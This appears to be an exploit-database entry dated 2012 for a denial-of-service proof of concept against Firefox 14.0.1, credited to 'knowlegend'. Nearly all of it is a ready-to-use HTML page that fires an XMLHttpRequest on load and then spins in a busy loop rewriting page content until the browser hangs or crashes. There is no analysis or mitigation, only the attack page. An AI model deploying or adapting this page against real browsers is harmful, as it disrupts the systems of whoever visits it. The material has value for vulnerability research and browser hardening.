Mozilla Firefox 14.0.1 Denial of Service Vulnerability

2012-12-22T00:00:00
ID 1337DAY-ID-20032
Type zdt
Reporter knowlegend
Modified 2012-12-22T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
       <head>
           <title>FF-14.0.1 DoS-Exploit by Know v3.0</title>
           <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
                    <meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" />
                   
                    <script type="text/javascript" language="JavaScript">
                            var CrashIt = false;
     
                            if (typeof CrashIt != 'undefined')
                            {
                                CrashIt = new XMLHttpRequest();
                            }
                            if (!CrashIt)
                            {
                                try
                                {
                                    CrashIt = new ActiveXObject("Msxml2.XMLHTTP");
                                }
                                catch(e)
                                {
                                    try
                                    {
                                        CrashIt = new ActiveXObject("Microsoft.XMLHTTP");
                                    }
                                    catch(e)
                                    {
                                        CrashIt = null;
                                    }
                                }
                            }
                                           
                            function load()
                            {
                                    CrashIt.open('get','bla.php');
                                    CrashIt.onreadystatechange = handleContent;
                                    CrashIt.send(null);                    
                                    return false;
                                   
                            }
                           
                            function handleContent()
                            {
                                                       
                                    while(CrashIt.readyState != 4)
                                    {
                                            document.getElementById('inhalt').innerHTML = "pwnd";
                                   
                                    }
                                    document.getElementById('inhalt').innerHTML = CrashIt.responseText;  
                                                       
                            }
                           
                    </script>
                   
           
        </head>
        <body onload="load();">
            <div id="inhalt"></div>
               
        <body>
    </html>

#  0day.today [2018-02-16]  #